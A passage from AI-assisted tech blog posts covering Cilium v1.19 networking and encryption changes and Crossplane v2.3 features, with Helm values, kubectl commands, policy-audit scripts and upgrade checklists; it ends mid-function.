3	After 1 week stable, flip `allowRemoteNodeIdentities=false`	Join a fresh node, verify post-key-registration traffic flows	If new nodes must join without keys, temporarily set true
4	Add Prometheus alert on `cilium_encryption_unencrypted_packets_dropped_total` increasing	Zero alert fires for 14 days	On a fire, root-cause first, then re-enable

3. Ztunnel Transparent Encryption Beta — sidecarless workload authentication

The second big change is aligned with the service-mesh ecosystem's direction. v1.19 ships a beta integration of Ztunnel (zero-trust tunnel), the same primitive Istio Ambient Mode standardized. This is not just "Istio compatibility" — it means the Cilium node agent coordinates directly with ztunnel to run a separate mTLS dataplane wrapping workload-to-workload TCP.

3.1 What is different from IPsec/WireGuard?

Axis	IPsec/WireGuard (node-to-node)	Ztunnel (workload-to-workload)
Scope	Node ↔ Node (L3/L4)	Workload ↔ Workload (L4 / mTLS)
Auth unit	Node ID (Cilium identity)	SPIFFE SVID (workload ID)
Key management	IPsec SA / WG peer key	SPIRE-compatible SDS
Sidecars required	No	No (ztunnel runs as a node DaemonSet)
Granularity	Cluster-wide	Per-namespace enrollment
Mesh interop	—	Works with Istio Ambient L4 or Cilium Ztunnel

3.2 Enabling — namespace-scoped enrollment

# helm/cilium-values.yaml — Ztunnel beta
# WARNING: Beta — recommend 4 weeks of staging validation before production
encryption:
  enabled: true
  type: ztunnel
  ztunnel:
    enabled: true                       # v1.19 new beta gate
    image:
      repository: quay.io/cilium/ztunnel
      tag: v1.19.4
    spire:
      enabled: true                     # SPIFFE SVID issuance — requires SPIRE server
      serverAddress: spire-server.spire-system:8081
      trustDomain: cluster.local

# Enroll a namespace into Ztunnel
kubectl label namespace payments cilium.io/ztunnel-enabled=true
kubectl rollout restart -n payments deploy

# Verify enrollment
kubectl -n kube-system get pods -l app=ztunnel
# NAME            READY   STATUS    AGE
# ztunnel-abc12   1/1     Running   1m
# ztunnel-def34   1/1     Running   1m

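# Verify enrolled-workload mTLS
# NOTE: illustrative output. With transparent encryption the TLS handshake happens in ztunnel,
# outside the pod, so an in-pod plain-HTTP curl may not print TLS details.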
kubectl -n payments exec -it api-pod -- curl -v http://db:5432
# * SSL connection using TLSv1.3 / TLS_AES_128_GCM_SHA256
# * Server certificate: spiffe://cluster.local/ns/payments/sa/db

4. ClusterMesh policy-default-local-cluster — default change blocks incidents

The quietest but most impactful change in v1.19. When a NetworkPolicy selector did not specify a cluster, v1.18 matched the entire mesh. So if one cluster wrote allow from app=frontend, workloads in another cluster labeled app=frontend were also implicitly allowed. Even when operators meant "only inside my cluster," the policy quietly fanned out through the mesh.

4.1 The accidental cross-cluster exposure pattern

# Pre-v1.19: unintentionally fanned out across the mesh
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: api-allow-frontend
  namespace: production
spec:
  endpointSelector:
    matchLabels:
      app: api
  ingress:
    - fromEndpoints:
        - matchLabels:
            app: frontend    # WARNING: in v1.18 this matched app=frontend across the entire mesh

4.2 New default — local cluster only

# v1.19 implicitly adds io.cilium.k8s.policy.cluster=<local>
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: api-allow-frontend
  namespace: production
spec:
  endpointSelector:
    matchLabels:
      app: api
  ingress:
    - fromEndpoints:
        - matchLabels:
            app: frontend    # v1.19 narrows to the local cluster

# Explicit opt-in for mesh-wide matching
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: api-allow-frontend-mesh
  namespace: production
spec:
  endpointSelector:
    matchLabels:
      app: api
  ingress:
    - fromEndpoints:
        - matchLabels:
            app: frontend
            io.cilium.k8s.policy.cluster: cluster-east   # explicit match

4.3 Upgrade action — audit existing mesh policies first

Upgrading to v1.19 may suddenly narrow policies that implicitly traversed the mesh, breaking communication. The maintainers recommend the following procedure in the upgrade guide:

# Step 1: Find CiliumNetworkPolicy rules that don't specify the cluster label
kubectl get ciliumnetworkpolicy -A -o json \
  | jq -r '.items[] | select(any(.spec.ingress[]?.fromEndpoints[]?; (.matchLabels // {}) | has("io.cilium.k8s.policy.cluster") | not)) | .metadata.namespace + "/" + .metadata.name'

# Step 2: Ask each policy owner whether the intent was mesh or local
# Step 3: For mesh intent, PR explicit cluster labels
# Step 4: Upgrade to v1.19 — missing mesh policies will sever communication immediately
helm upgrade cilium cilium/cilium --version 1.19.4 --namespace kube-system --reuse-values
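
The audit in Step 1 can also be sketched in Python, which is easier to extend and unit-test than a one-line filter. The input is assumed to be the parsed output of `kubectl get ciliumnetworkpolicy -A -o json`; the helper name and sample policies are hypothetical. This sketch only inspects `spec.ingress[].fromEndpoints[].matchLabels`, so egress rules, `matchExpressions`, and policies that use `specs` would need extra handling.

```python
from typing import Any, Dict, List

CLUSTER_LABEL = "io.cilium.k8s.policy.cluster"


def policies_without_cluster_label(policy_list: Dict[str, Any]) -> List[str]:
    """Return namespace/name of policies with an ingress selector lacking the cluster label."""
    flagged = []
    for item in policy_list.get("items", []):
        rules = (item.get("spec") or {}).get("ingress") or []
        selectors = [sel for rule in rules for sel in (rule.get("fromEndpoints") or [])]
        if any(CLUSTER_LABEL not in (sel.get("matchLabels") or {}) for sel in selectors):
            meta = item["metadata"]
            flagged.append(f'{meta["namespace"]}/{meta["name"]}')
    return flagged


# Hypothetical sample: one implicit (unlabeled) policy, one explicit one.
SAMPLE = {
    "items": [
        {
            "metadata": {"namespace": "production", "name": "api-allow-frontend"},
            "spec": {"ingress": [{"fromEndpoints": [{"matchLabels": {"app": "frontend"}}]}]},
        },
        {
            "metadata": {"namespace": "production", "name": "api-allow-frontend-mesh"},
            "spec": {"ingress": [{"fromEndpoints": [
                {"matchLabels": {"app": "frontend", CLUSTER_LABEL: "cluster-east"}}
            ]}]},
        },
    ]
}

print(policies_without_cluster_label(SAMPLE))
```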

5. Multi-Pool IPAM Stable — works with IPsec and direct routing

Multi-Pool IPAM was introduced as Beta in v1.16, opening operational autonomy to allocate different CIDRs to different workloads in the same cluster. But up to v1.18 it had no stability guarantees on IPsec or direct-routing environments, which limited production use. v1.19 graduates it to Stable, and both environments are officially supported.

5.1 CiliumPodIPPool example

# Payments workload pool — non-overlapping CIDR with corporate VPC
apiVersion: cilium.io/v2alpha1
kind: CiliumPodIPPool
metadata:
  name: payments-pool
spec:
  ipv4:
    cidrs:
      - 10.20.0.0/16
    maskSize: 24
  ipv6:
    cidrs:
      - fd00:20::/56
    maskSize: 64

# Pod chooses pool via annotation
apiVersion: v1
kind: Pod
metadata:
  name: api-server
  namespace: payments
  annotations:
    ipam.cilium.io/ip-pool: payments-pool   # v1.19 Stable
spec:
  containers:
    - name: api
      image: api:1.0
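
A quick capacity check for a pool definition like the one above. It assumes `maskSize` is the prefix length of each block carved out of the pool CIDR for a node; the `pool_capacity` helper is illustrative.

```python
import ipaddress
from typing import Tuple


def pool_capacity(cidr: str, mask_size: int) -> Tuple[int, int]:
    """Return (number of blocks, addresses per block) for a pool CIDR and mask size."""
    net = ipaddress.ip_network(cidr)
    if not net.prefixlen <= mask_size <= net.max_prefixlen:
        raise ValueError(f"mask size {mask_size} does not fit inside {cidr}")
    blocks = 2 ** (mask_size - net.prefixlen)
    addresses_per_block = 2 ** (net.max_prefixlen - mask_size)
    return blocks, addresses_per_block


print(pool_capacity("10.20.0.0/16", 24))
```

For the IPv4 pool above this gives 256 blocks of 256 addresses each, which bounds how many node-sized allocations the pool can hand out before it is exhausted.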

5.2 IPsec strict mode + Multi-Pool combo — set strict CIDR wide enough

# When combining the two, the strict CIDR must cover every pool
encryption:
  enabled: true
  type: ipsec
  strictMode:
    enabled: true
    cidr: "10.0.0.0/8"    # WARNING: must encompass all CiliumPodIPPool CIDRs
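
The "strict CIDR must cover every pool" rule is easy to check before rollout. The sketch below uses Python's standard `ipaddress` module; the `uncovered_pools` helper and the second pool CIDR are hypothetical.

```python
import ipaddress
from typing import List


def uncovered_pools(strict_cidr: str, pool_cidrs: List[str]) -> List[str]:
    """Return the pool CIDRs that are not fully contained in the strict-mode CIDR."""
    strict = ipaddress.ip_network(strict_cidr)
    missing = []
    for cidr in pool_cidrs:
        pool = ipaddress.ip_network(cidr)
        # subnet_of() raises TypeError across IP versions, so compare versions first.
        if pool.version != strict.version or not pool.subnet_of(strict):
            missing.append(cidr)
    return missing


print(uncovered_pools("10.0.0.0/8", ["10.20.0.0/16", "172.16.0.0/20"]))
```

Any CIDR this returns is a pool the strict-mode CIDR would not cover, so it is worth running as a pre-merge check on the Helm values and pool manifests.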

6. Hubble drop event policy tagging, encrypted-flow filters, Trace IP Options

The three observability additions in v1.19 cut debugging time directly.

6.1 Drop events automatically carry the denying policy name

# v1.18: drop reason only — "which policy denied?" needs manual correlation
hubble observe --verdict DROPPED --since 5m
# Aug 12 12:34:56 default/api-1234 :: default/db-5678 DROPPED (Policy denied)

# v1.19: policy name and namespace attached to the verdict label
hubble observe --verdict DROPPED --since 5m -o json | jq '.flow.dropReasonDesc'
# {
#   "reason": "PolicyDenied",
#   "policy_name": "default-deny-egress",
#   "policy_namespace": "production",
#   "policy_kind": "CiliumNetworkPolicy"
# }
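
Once drops carry the policy name, ranking "which policy denies the most traffic" is a small aggregation. The sketch below assumes the JSON shape shown in the example above (`flow.dropReasonDesc` with `policy_name` and `policy_namespace`); those field names are copied from that example and not verified against Hubble's schema, and the sample lines are made up.

```python
import json
from collections import Counter
from typing import Iterable, Tuple


def drops_by_policy(json_lines: Iterable[str]) -> Counter:
    """Count dropped flows per (policy_namespace, policy_name)."""
    counts: Counter = Counter()
    for raw in json_lines:
        desc = json.loads(raw).get("flow", {}).get("dropReasonDesc") or {}
        if isinstance(desc, dict) and desc.get("policy_name"):
            key: Tuple[str, str] = (desc.get("policy_namespace", ""), desc["policy_name"])
            counts[key] += 1
    return counts


# Made-up flows in the assumed shape.
SAMPLE_FLOWS = [
    '{"flow": {"dropReasonDesc": {"reason": "PolicyDenied", "policy_name": "default-deny-egress", "policy_namespace": "production"}}}',
    '{"flow": {"dropReasonDesc": {"reason": "PolicyDenied", "policy_name": "default-deny-egress", "policy_namespace": "production"}}}',
    '{"flow": {"verdict": "FORWARDED"}}',
]

for (namespace, name), count in drops_by_policy(SAMPLE_FLOWS).most_common():
    print(f"{namespace}/{name}: {count}")
```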

6.2 Encrypted vs unencrypted flow filtering

# Show only unencrypted traffic — essential before enabling strict mode
hubble observe --unencrypted --since 1h | tee unencrypted.log

# Show only encrypted traffic for analysis
hubble observe --encrypted --since 1h --output json > encrypted.jsonl

6.3 Trace IP Options — mark specific packets for path tracing

# Mark packets with IPv4 options to trace their datapath hops
# WARNING: some NICs/switches drop packets with IPv4 options — validate in test env
kubectl -n kube-system patch cm cilium-config --type merge -p '{"data":{"trace-ip-options":"true"}}'
kubectl -n kube-system rollout restart ds/cilium

# Show per-hop trace for marked packets
hubble observe --ip-option-marked --output table

7. Network Policy ICMPv4 Destination Unreachable — ending the dumb 30-second retry

In v1.18 and earlier, a Network Policy denial silently dropped the packet and the client retried TCP for about 30 seconds. v1.19 adds an option to return ICMPv4 Destination Unreachable (code 13, Communication Administratively Prohibited). The client's TCP stack can then fail the connection attempt immediately instead of retrying until it times out, and debugging latency collapses.

# helm/cilium-values.yaml
# WARNING: external firewalls blocking ICMPv4 will swallow the response
policyEnforcementMode: default
policyAuditMode: false
icmpUnreachable:
  enabled: true       # v1.19 new — friendly deny response

# Verify the friendly deny
kubectl exec -it test-pod -- curl -v http://api:8080
# * connect to api port 8080 failed: Connection refused   ← terminates immediately, no 30s wait

8. Visualization — how v1.19's six axes combine in the deployment flow

The diagram below shows how the six axes of v1.19 combine when a new workload is deployed.

flowchart LR
    A[New Pod deploy] --> B{Which IP Pool?}
    B -->|payments-pool| C[Multi-Pool IPAM Stable<br/>allocate from 10.20.0.0/16]
    C --> D{Inside strict mode CIDR?}
    D -->|Yes| E[IPsec/WireGuard<br/>strict encryption enforced]
    D -->|No| F[Plaintext blocked → cut traffic]
    E --> G{Namespace enrolled in Ztunnel?}
    G -->|Yes| H[Ztunnel mTLS Beta<br/>SPIFFE SVID issued]
    G -->|No| I[L4 only]
    H --> J[Evaluate CiliumNetworkPolicy]
    I --> J
    J -->|allow| K[Hubble flow OK]
    J -->|deny| L[ICMPv4 friendly deny<br/>Hubble drop + policy name tagged]

9. ManoIT internal checklist: 3 clusters × 16 steps

The checklist below turns the sections above into an operations procedure. ManoIT runs three clusters (prod / stage / dev) and validates alpha/beta features in staging for 2 weeks and prod for 1 week before progressive rollout.

#	Item	Owner	Completion criteria
1	Inventory Cilium · Hubble · ClusterMesh API server versions across 3 clusters	Platform team	PR listing instances below v1.19
2	Audit CiliumNetworkPolicy — extract rules with no cluster label	Platform team	jq script output + contact each policy owner
3	Add explicit cluster labels to policies whose intent was mesh-wide	Each service owner	All policy PRs merged
4	Upgrade dev to v1.19.4 (strict OFF, Ztunnel OFF)	Platform team	`cilium version` = 1.19.4
5	Validate mesh-policy regression in dev — zero unintended communication breaks	Each service owner	Hubble drop counter delta report
6	Enable Multi-Pool IPAM Stable in staging with v1.19.4	Platform team	Verify allocation from payments-pool for new pods
7	Enable IPsec strict mode in staging via 4-step gradient	Platform team	14-day report with unencrypted drops = 0
8	Enable Ztunnel Beta in staging — only one namespace enrolled	Platform team	SPIRE integration OK, mTLS flow visible in Hubble
9	Verify Hubble drop tagging, encrypted filter, Trace IP Options	Observability team	Operations runbook updated for the 3 features
10	Enable ICMPv4 friendly deny — check external firewall ICMP rules	Network + Platform team	Immediate termination verified (curl/ping tests)
11	Upgrade prod to v1.19.4 (strict OFF, Ztunnel OFF)	Platform team	prod `cilium version` = 1.19.4
12	Enable Multi-Pool IPAM in prod — payments and logs workloads first	Platform team	Per-pool IP usage exported as Prometheus metric
13	Gradually enable IPsec strict mode in prod — 4-step standard procedure	Platform team	30-day unencrypted drops = 0 + compliance audit evidence
14	Enable ICMPv4 friendly deny in prod — paired with step 7	Platform team	Average denial termination time 30s → 1s measurement
15	Add Prometheus alerts — `cilium_encryption_unencrypted_packets_dropped_total` increase, ClusterMesh policy drop spikes, Multi-Pool exhaustion	Observability team	Alert rule PR merged, fire/resolve test passes
16	Operational RFC — Ztunnel Beta enrollment for new workloads only, existing workloads after Beta exits	Platform team	RFC merged, scheduled for quarterly security review

10. Conclusion — the 10-year inflection point that flipped defaults toward safety

Wrap the six changes of v1.19 in one line: "Cilium spent ten years getting to the point where it can ship operational safety nets as defaults." Strict mode for IPsec and WireGuard structurally erases the plaintext window of best-effort encryption. Ztunnel integration brings sidecarless workload authentication to beta and aligns with the Istio Ambient camp. ClusterMesh policy-default-local-cluster inverts the most dangerous default of the past six years. Multi-Pool IPAM Stable hands back CIDR autonomy in a safe form. Hubble drop tagging, encrypted-flow filters, and Trace IP Options answer "why was this dropped?" in one command. ICMPv4 friendly deny collapses 30-second retry loops to 1 second.

Three reminders for operators as we close. (1) Audit ClusterMesh policies before upgrading — the policy-default-local-cluster default flip is the most common v1.19 incident cause, and it can cut traffic without warning. (2) Roll out strict mode in four steps — key distribution → enable strict (allow remote = true) → 1-week soak → allow remote = false → 30-day stability monitoring is the safe progression. (3) Adopt Ztunnel Beta starting from new namespaces — SPIRE / SPIFFE SVID integration is operationally heavy, so enroll payments and high-sensitivity workloads first and revisit the rest after v1.20 GA. The 16-item checklist in §9 is exactly that, expressed as an internal procedure. The shortest one-line recommendation: "Upgrade dev to v1.19.4 today, and open the ClusterMesh policy audit PR this week."

ⓘ This article was produced by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent) by analyzing the Cilium v1.19.0 release notes (GitHub Discussions #44191) published on May 13, 2026, the subsequent v1.19.4 patch (2026-05-27), the Encryption / IPAM / Hubble / ClusterMesh docs at docs.cilium.io, Isovalent's v1.19 release blog, and InfoQ's 10-year retrospective as primary sources. The alpha/beta gate flag names, behaviors, and metrics in this article reflect the official documentation as of the publication date (2026-05-28); Beta features may change in subsequent releases. Verify against cilium/cilium GitHub Releases and docs.cilium.io before applying to production. The internal-adoption examples cite an adapted ManoIT platform-team RFC.

Originally published at ManoIT Tech Blog.

Crossplane v2.3 Deep Dive — High-Fidelity Render Engine, Provider Deletion Protection, Reconciliation Annotations, and CLI Separation

daniel jeong — Wed, 27 May 2026 00:42:22 +0000

Crossplane v2.3 Deep Dive — High-Fidelity Render Engine, Provider Deletion Protection, Reconciliation Annotations, and CLI Separation Redefining the 2026 Kubernetes Control Plane

On May 21, 2026, the Crossplane maintainers shipped v2.3.0, the quarterly release that — for the first time in the v2 series — turned the "production-grade control plane" pitch into measurable operational evidence. v2.0 brought the big architectural earthquake (namespaced XRs and MRs, composing any resource, Operations), v2.1/v2.2 made it run, and v2.3 closes the long-standing day-2 gaps that platform teams have been quietly working around for years.

Six changes carry the release:

High-Fidelity Render Engine — crossplane render now drives the real in-cluster composite reconciler via a hidden crossplane internal render subcommand, instead of a parallel reimplementation.
Alpha Provider Deletion Protection — Crossplane auto-creates ClusterUsage resources that block Provider deletion through the existing Usage webhook while managed resources of that Provider's kinds still exist.
Two new reconciliation annotations — crossplane.io/poll-interval overrides the controller-level poll interval per-resource, and crossplane.io/reconcile-requested-at triggers an immediate reconcile whenever the value changes.
XR Circuit Breaker reset — when an XR is deleted, its circuit-breaker state is now discarded so a same-named replacement starts clean.
No-op status update skip for CompositionRevision and composite reconcilers, behind the alpha gate --enable-no-op-status-update-skip.
Crossplane CLI repository split — the CLI moves to its own repository (crossplane/crossplane-cli) with an independent release cadence.

This article unpacks each of the six changes at the level of code paths and alpha gate flags, and lays out the staged upgrade/observation/rollback workflow we used at ManoIT across three control planes (prod/stage/dev).

Disclosure: cross-posted from the ManoIT tech blog. Original (Korean) published 2026-05-27. AI-assisted authoring with editorial review.

1. Why May 21, 2026 Is a Crossplane Inflection Point

Crossplane was open-sourced by Upbound in December 2018, joined the CNCF as a Sandbox project in 2020, became Incubating in 2021, and was promoted to CNCF Graduated on October 28, 2025. The identity drift between v1 ("Kubernetes-native IaC, a Terraform alternative") and v2 ("a control-plane SDK on top of the Kubernetes API") matters because it changes how you should read the v2.3 release notes.

Date	Event	Operational meaning
2018-12	Upbound open-sources Crossplane	"IaC on Kubernetes" vision begins
2020-06	CNCF Sandbox accepted	Community governance, stage 1
2021-09	CNCF Incubating	Production-use accumulation phase
2024-05	v1.17 — native patch & transform deprecated	Composition Function era declared
2025-07	v2.0 — namespaced XR/MR, Operations alpha, compose any resource	Identity shift to "control-plane SDK"
2025-10-28	CNCF Graduated	Enterprise adoption guidance formalized
2025-11	v2.1 — namespaced MR stable, MRD alpha	Selective resource activation for large Providers
2026-03	v2.2 — Pipeline Inspector, RequiredSchemas, ImageConfig, XRD CEL validation	Composition Function debugging/validation gaps closed
2026-05-21	v2.3 — Render Engine unification, Provider deletion protection, reconcile annotations ×2, CLI split	Local ↔ cluster gap removed; operational safety net hardened
2027-02	v2.3 EOL planned	Quarterly release + 9-month support window maintained

Two operational headlines:

The six-year chronic pain of "render locally, fail in cluster" is structurally gone — the maintainers retired the parallel reconciler used by crossplane render and now expose the real composite reconciler as the hidden crossplane internal render subcommand, which crossplane render (and downstream tools like crossplane-diff) calls.
Two new alpha gates (--enable-provider-deletion-protection, --enable-no-op-status-update-skip) close the operational safety-net gap immediately — accidental Provider deletion is the #1 way Crossplane operators have orphaned MRs, and the no-op status skip cuts ETCD PUT pressure that scales linearly with cluster size.

2. High-Fidelity Render Engine — Removing the Local Render ↔ Cluster Reconcile Gap

The biggest maintainer-side work in v2.3 happened where you couldn't see it. crossplane render has, since the v1 days, been the way to preview how an XR resolves through a Composition Function pipeline. The catch: the reconciler that render used was a structurally separate reimplementation of what the in-cluster composite controller actually ran.

2.1 The Two-Reconciler Gap Through v2.2

Axis	Local `render` (v2.2)	In-cluster controller (v2.2)
Reconciler implementation	Render-only reimplementation	Official `composite` package implementation
Pipeline step context	Partial propagation	Full propagation
Required Resources/Schemas	Partial in local	Full RequiredSchemas since v2.2
Managed metadata (labels, owner refs)	Some missing post-render	Attached as actually applied
Downstream tools (`crossplane-diff`)	Inherited the gap through `render` output	—
"Works locally, breaks in cluster" issues	Frequent	—

2.2 The v2.3 Fix — Share Code via `crossplane internal render`

v2.3 exposes the in-cluster composite reconciler as a callable subcommand. The new name is crossplane internal render — the "internal" prefix is deliberate: it's a backend for other tools, not a user-facing command. crossplane render now calls this backend, so local output goes through the exact same code path as the cluster.

# v2.3: crossplane render now invokes the same composite reconciler internally
crossplane render \
  examples/xr.yaml \
  examples/composition.yaml \
  examples/functions.yaml \
  --include-full-xr \
  --include-context

# You can now 1:1 compare the local output to what the controller produces in cluster
kubectl get app my-app -o yaml > cluster.yaml
crossplane render examples/xr.yaml examples/composition.yaml examples/functions.yaml > local.yaml
diff cluster.yaml local.yaml   # Note: post-v2.3, substantive diff is 0 modulo metadata/status

The downstream impact is large. crossplane-diff, crossplane-test, and every CI workflow that validates compositions on PRs were all subject to the same gap, so v2.3 removes one whole class of "PR was green, merge broke prod" incident.

2.3 Operational Application — Render-vs-Cluster Diff Gate in CI

# .github/workflows/crossplane-composition-check.yml
# Note: pre-v2.3, this comparison is meaningless because of the render gap
name: Crossplane Composition Drift Gate
on:
  pull_request:
    paths: ["compositions/**", "xrs/**", "functions/**"]

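jobs:
  drift-gate:
    runs-on: ubuntu-24.04
    strategy:
      matrix:
        # Illustrative pair; list every XR/Composition file stem to check
        include:
          - xr: my-app
            composition: my-app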
    steps:
      - uses: actions/checkout@v5
      - name: Install Crossplane CLI v2.3.0
        run: |
          curl -sSL "https://releases.crossplane.io/stable/v2.3.0/bin/linux_amd64/crossplane" -o crossplane
          sudo install -m 0755 crossplane /usr/local/bin/crossplane
          crossplane version --client   # client: 2.3.0

      - name: Render with Composition Function pipeline
        run: |
          # High-Fidelity Render — same code path as in-cluster controller
          crossplane render \
            xrs/${{ matrix.xr }}.yaml \
            compositions/${{ matrix.composition }}.yaml \
            functions/index.yaml \
            --include-full-xr \
            --include-context \
            -o yaml > rendered.yaml

      - name: Fetch live cluster state (prod read-only)
        run: |
          # rendered.yaml is a multi-document stream; the XR is its first document
          yq 'select(di == 0) | del(.status)' rendered.yaml > rendered-xr.yaml
          kubectl --context prod-ro get "$(yq '.kind' rendered-xr.yaml)" \
            "$(yq '.metadata.name' rendered-xr.yaml)" -o yaml \
            | yq 'del(.metadata.managedFields, .metadata.resourceVersion, .metadata.uid, .status)' \
            > cluster.yaml

      - name: Diff and fail on unexpected drift
        run: |
          diff -u cluster.yaml rendered-xr.yaml || {
            echo "::error::Composition output diverges from cluster: review before merge"
            exit 1
          }
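
The diff step is only meaningful if volatile, server-populated fields are stripped from both sides first. As a rough sketch of that normalization, the Python below uses plain dictionaries standing in for parsed YAML. The field list mirrors the `yq del(...)` call above, and the helper names are hypothetical.

```python
import copy

# Server-populated metadata keys that differ between a render and a live object.
VOLATILE_METADATA = ("managedFields", "resourceVersion", "uid")


def normalize(manifest: dict) -> dict:
    """Return a copy of the manifest without status and volatile metadata."""
    out = copy.deepcopy(manifest)
    out.pop("status", None)
    meta = out.get("metadata", {})
    for key in VOLATILE_METADATA:
        meta.pop(key, None)
    return out


def drifted(rendered: dict, live: dict) -> bool:
    """True when the two manifests still differ after normalization."""
    return normalize(rendered) != normalize(live)
```

In practice a live object carries more server-set fields (for example `creationTimestamp` and `generation`), so the tuple would likely need extending before this comparison is quiet on a real cluster.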

3. Alpha Provider Deletion Protection — Auto ClusterUsage + Usage Webhook

The second change targets the highest-frequency operator incident: "I accidentally deleted a Provider and every MR of its kinds was orphaned." Every Crossplane operator has either lived this or heard the story.

3.1 The Existing Usage Webhook's Limitation — XR/MR Level Only

Crossplane has shipped the Usage resource since v1 to express "while resource A is in use, refuse to delete resource B." A ValidatingAdmissionWebhook intercepts DELETE requests and rejects them if a Usage still names a live dependency. The problem: Provider packages themselves had no equivalent guard. One kubectl delete provider provider-aws would strand every MR of every kind that Provider defined.

3.2 v2.3 — Auto-Create `ClusterUsage` to Block Provider DELETE

v2.3 introduces the alpha gate --enable-provider-deletion-protection. When on, Crossplane automatically:

Step	Action	Implementation
1	On Provider install, create a `ClusterUsage`	Provider controller creates `kind: ClusterUsage` at bootstrap, `spec.of` points to the Provider itself
2	While MRs of that Provider's kinds exist, mark `ClusterUsage` Active	`spec.by` selector auto-maps to the Provider's CRD labels
3	Provider DELETE intercepted by Usage webhook	Reuses the existing Usage webhook code path
4	DELETE allowed only when active MRs = 0	Otherwise the webhook denies the request with a human-readable message
5	Provider tear-down requires explicit opt-out	Operator clears all MRs, then `kubectl delete clusterusage protect-provider-aws-...`
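
The decision in steps 2 to 4 boils down to one check: does any live resource still belong to a kind the Provider defines? The following is a minimal Python sketch of that rule, not the Crossplane webhook code. The function name, the dictionary shape, and the message wording are assumptions made for illustration.

```python
def may_delete_provider(managed_kinds: set[str], live_resources: list[dict]) -> tuple[bool, str]:
    """Allow deletion only when no live resource belongs to the Provider's kinds."""
    blocking = [r for r in live_resources if r["kind"] in managed_kinds]
    if not blocking:
        return True, "no managed resources remain"
    kinds = {r["kind"] for r in blocking}
    return False, (
        f"provider is in use by {len(blocking)} managed resources "
        f"of {len(kinds)} kinds"
    )
```

Resources of kinds the Provider does not define are ignored, which is why clearing the Provider's own MRs is enough to unblock the delete.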

3.3 Turning It On — Helm Values + Gate Flag

# helm/crossplane-values.yaml
# Note: alpha feature, verify for 1 week in staging before production
# Keys sit at the top level because this file is passed straight to the crossplane chart
args:
  - --debug
  - --enable-environment-configs
  - --enable-operations
  - --enable-provider-deletion-protection   # v2.3 alpha gate
  - --enable-no-op-status-update-skip       # v2.3 alpha: cut ETCD writes
resourcesCrossplane:
  limits:
    cpu: "500m"
    memory: "1Gi"
  requests:
    cpu: "100m"
    memory: "256Mi"
metrics:
  enabled: true   # Prometheus scraping recommended

# Verify after enable
helm upgrade crossplane crossplane-stable/crossplane \
  --version 2.3.0 \
  --namespace crossplane-system \
  -f helm/crossplane-values.yaml

# ClusterUsage is auto-created on Provider install
kubectl get clusterusage
# NAME                              OF                       BY                 AGE
# protect-provider-aws-12fa3        provider-aws             provider-aws-mrs   1m

# Intentional delete attempt — refused
kubectl delete provider provider-aws
# Error from server (Forbidden): admission webhook "no-usages.apiextensions.crossplane.io" denied the request:
# this provider is in-use by 247 managed resources of 12 kinds: cannot delete

3.4 Standard Tear-Down Workflow

Even with the alpha gate on, you still need a clean tear-down procedure. Our ManoIT standard:

# Step 1: inventory every MR of the Provider as kind, apiVersion, name, namespace
# (--api-group matches one exact group, so select the per-service groups such as s3.aws.upbound.io with grep)
kubectl get "$(kubectl api-resources -o name | grep -E '^[^.]+\.[^.]+\.aws\.upbound\.io$' | paste -sd, -)" -A \
  -o jsonpath='{range .items[*]}{.kind}{"\t"}{.apiVersion}{"\t"}{.metadata.name}{"\t"}{.metadata.namespace}{"\n"}{end}' \
  > aws-mrs-inventory.tsv

# Helper: run one kubectl verb per inventoried MR
# (xargs -I{} would hand kubectl each whole TSV line as a single argument)
each_mr() {
  while IFS=$'\t' read -r kind api name ns; do
    kubectl "$@" ${ns:+-n "$ns"} "${kind}.${api%%/*}" "$name"
  done < aws-mrs-inventory.tsv
}

# Step 2: decide deletionPolicy=Orphan or proper delete, apply in bulk
each_mr patch --type=merge -p '{"spec":{"deletionPolicy":"Orphan"}}'

# Step 3: delete all MRs; ClusterUsage auto-transitions to Inactive
each_mr delete
kubectl get clusterusage protect-provider-aws-12fa3 -o yaml | yq '.status.conditions[0].reason'
# Inactive

# Step 4: remove ClusterUsage → Provider delete now allowed
kubectl delete clusterusage protect-provider-aws-12fa3
kubectl delete provider provider-aws

4. Two Reconciliation Annotations — Per-Resource Polling and Immediate Trigger

The third change resolves a six-year-old operator ask: per-resource reconcile cadence control, via two annotations.

Annotation	Meaning	Example	Use case
`crossplane.io/poll-interval`	Override controller-level poll interval for this resource	`"24h"`, `"30m"`, `"5m"`	Low-volatility IAM, baseline infra
`crossplane.io/reconcile-requested-at`	Trigger an immediate reconcile whenever the value changes	RFC3339 timestamp (`"2026-05-27T08:15:00Z"`)	Post-external-change sync, debugging, operational force-refresh

4.1 Per-Resource Poll Override — End of Global-Only Cadence

Through v2.2 the poll interval was a single controller-startup flag (--poll-interval). The result: an IAM Role that almost never changes was polled at the same cadence as an RDS Instance, inflating cloud-API call cost and controller load.

# IAM Role — barely changes, 24h polling is enough
apiVersion: iam.aws.m.upbound.io/v1beta1
kind: Role
metadata:
  namespace: platform
  name: eks-node-role
  annotations:
    crossplane.io/poll-interval: "24h"   # v2.3 new
spec:
  forProvider:
    assumeRolePolicy: |
      {"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}
---
# RDS Instance — fast sync for backup/snapshot state, 1m polling
apiVersion: rds.aws.m.upbound.io/v1beta1
kind: Instance
metadata:
  namespace: marketing
  name: marketing-pg
  annotations:
    crossplane.io/poll-interval: "1m"
spec:
  forProvider:
    region: ap-northeast-2
    engine: postgres
    engineVersion: "18.4"
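
To make the override rule concrete, here is a minimal Python sketch of how an effective interval could be resolved: the annotation wins when present, otherwise the controller-level default applies. This is not Crossplane's implementation. The duration parser handles only a simplified subset of Go-style durations (`h`, `m`, `s`), and how Crossplane treats a malformed value is not covered by the source, so raising an error here is an assumption.

```python
import re
from datetime import timedelta

ANNOTATION = "crossplane.io/poll-interval"
_UNITS = {"h": "hours", "m": "minutes", "s": "seconds"}


def parse_duration(text: str) -> timedelta:
    """Parse a simplified Go-style duration such as "24h", "30m" or "1h30m"."""
    parts = re.findall(r"(\d+)([hms])", text)
    # Reject anything the pattern did not consume completely.
    if not parts or "".join(n + u for n, u in parts) != text:
        raise ValueError(f"unsupported duration: {text!r}")
    return sum((timedelta(**{_UNITS[u]: int(n)}) for n, u in parts), timedelta())


def effective_poll_interval(metadata: dict, controller_default: timedelta) -> timedelta:
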